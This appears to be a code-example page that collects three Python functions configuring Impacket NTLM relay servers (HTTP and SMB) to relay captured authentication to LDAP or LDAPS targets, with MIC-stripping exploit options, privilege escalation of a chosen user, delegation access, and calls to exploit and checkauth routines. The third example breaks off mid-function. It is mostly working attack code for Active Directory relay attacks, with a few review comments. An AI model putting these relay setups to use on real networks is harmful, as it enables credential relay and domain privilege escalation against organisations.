예제 #1
def start_servers(options, threads):
    """Configure and start the HTTP relay listener described by *options*.

    For each relay server class (only ``HTTPRelayServer`` here) a fresh
    ``NTLMRelayxConfig`` is populated from ``options`` and from the names
    ``codec``, ``mode``, ``PROTOCOL_CLIENTS`` and ``PROTOCOL_ATTACKS``, which
    are resolved from an outer scope not shown in this block. The server is
    then built from that config, started, and registered in ``threads``.

    Args:
        options: Parsed options object. Attributes read: ``e``, ``c``,
            ``enum_local_admins``, ``lootdir``, ``output_file``,
            ``interactive``, ``upload``, ``ipv6``, ``wpad_host``,
            ``wpad_auth_num``, ``smb2support``, ``interface_ip``,
            ``remove_mic``, ``remove_target`` and ``http_port``.
        threads: Collection exposing ``add``; receives each started server.

    Returns:
        The config object built for the last server that was started.
    """
    server_classes = (HTTPRelayServer,)
    for server_cls in server_classes:
        # Build one independent config per listener.
        config = NTLMRelayxConfig()
        config.setProtocolClients(PROTOCOL_CLIENTS)
        config.setExeFile(options.e)
        config.setCommand(options.c)
        config.setEnumLocalAdmins(options.enum_local_admins)
        config.setEncoding(codec)
        config.setMode(mode)
        config.setAttacks(PROTOCOL_ATTACKS)
        config.setLootdir(options.lootdir)
        config.setOutputFile(options.output_file)
        config.setInteractive(options.interactive)
        config.setGPotatoStartUp(options.upload)
        config.setIPv6(options.ipv6)
        config.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        config.setSMB2Support(options.smb2support)
        config.setInterfaceIp(options.interface_ip)
        # NOTE(review): remove_mic / remove_target presumably control stripping
        # of NTLM integrity fields before relaying; confirm in
        # NTLMRelayxConfig. Enforced signing and channel binding on the target
        # service are the controls to verify when assessing exposure.
        config.setExploitOptions(options.remove_mic, options.remove_target)
        config.setListeningPort(options.http_port)

        relay = server_cls(config)
        relay.start()
        threads.add(relay)
    return config
예제 #2
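def startServers(passargs):
    """Start an SMB relay listener, run ``exploit`` and wait for ``checkauth``.

    A single ``NTLMRelayxConfig`` is built with an ``ldaps://`` target taken
    from ``passargs.ldaps`` and handed to ``SMBRelayServer``. Once the server
    is started, ``exploit(passargs)`` is called; if it returns a truthy
    status, ``checkauth(passargs)`` runs in a daemon thread and this function
    waits for it to finish.

    Args:
        passargs: Parsed arguments object; ``ldaps`` is read here and the
            whole object is forwarded to ``exploit`` and ``checkauth``.

    Returns:
        None. The relay server is shut down on Ctrl-C, when ``exploit``
        reports failure, and when an exception escapes the try block.
    """
    ldaps_server = passargs.ldaps
    PoppedDB = Manager().dict()  # A dict of PoppedUsers
    PoppedDB_Lock = Lock()  # A lock for opening the dict
    c = NTLMRelayxConfig()
    c.setProtocolClients(PROTOCOL_CLIENTS)
    c.setTargets(
        TargetsProcessor(singleTarget=str("ldaps://" + ldaps_server),
                         protocolClients=PROTOCOL_CLIENTS))
    c.setOutputFile(None)
    c.setEncoding('ascii')
    c.setMode('RELAY')
    c.setAttacks(PROTOCOL_ATTACKS)
    c.setLootdir('.')
    # NOTE(review): "0.0.0.0" presumably makes the listener accept
    # connections on every local interface; confirm in NTLMRelayxConfig.
    c.setInterfaceIp("0.0.0.0")
    c.setExploitOptions(True)
    c.setSMB2Support(True)
    c.delegateaccess = True
    c.PoppedDB = PoppedDB  # pass the poppedDB to the relay servers
    c.PoppedDB_Lock = PoppedDB_Lock  # pass the lock guarding poppedDB as well
    s = SMBRelayServer(c)
    s.start()
    logging.info("Relay servers started, waiting for connection....")
    try:
        status = exploit(passargs)
        if status:
            exp = Thread(target=checkauth, args=(passargs, ))
            exp.daemon = True
            exp.start()
            try:
                # Wait with a timed join instead of spinning on `pass`: the
                # old loop pinned a CPU core, and Thread.isAlive() no longer
                # exists on Python 3.9+. The short timeout keeps Ctrl-C
                # responsive.
                while exp.is_alive():
                    exp.join(0.5)
            except KeyboardInterrupt:
                logging.info("Shutting down...")
                s.server.shutdown()
            # NOTE(review): when checkauth finishes on its own the listener
            # is not shut down here; verify the caller tears it down.
        else:
            logging.error("Error in exploit, Shutting down...")
            s.server.shutdown()
    except Exception as e:
        print(e)
        logging.error("Error in exploit, Shutting down...")
        logging.info("Shutting down...")
        s.server.shutdown()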
예제 #3
def startServers(passargs):
    targetSystem = passargs.target_host
    privuser = passargs.user
    PoppedDB = Manager().dict()  # A dict of PoppedUsers
    PoppedDB_Lock = Lock()  # A lock for opening the dict
    relayServers = [HTTPRelayServer, SMBRelayServer]
    serverThreads = []
    for server in relayServers:
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setTargets(
            TargetsProcessor(singleTarget=str("ldap://" + targetSystem),
                             protocolClients=PROTOCOL_CLIENTS))
        c.setOutputFile(None)
        c.setEncoding('ascii')
        c.setMode('RELAY')
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir('.')
        c.setInterfaceIp("0.0.0.0")
        c.setExploitOptions(True)
        c.escalateuser = privuser
        c.setSMB2Support(True)
        c.PoppedDB = PoppedDB  # pass the poppedDB to the relay servers
        c.PoppedDB_Lock = PoppedDB_Lock  # pass the poppedDB to the relay servers
        s = server(c)
        s.start()
        serverThreads.append(s)
    logging.info("Relay servers started, waiting for connection....")
    try:
        status = exploit(passargs)
        if status:
            exp = Thread(target=checkauth, args=(passargs, ))
            exp.daemon = True
            exp.start()
            try:
                while exp.isAlive():
                    pass
            except KeyboardInterrupt, e:
                logging.info("Shutting down...")
                for thread in serverThreads:
                    thread.server.shutdown()
        else: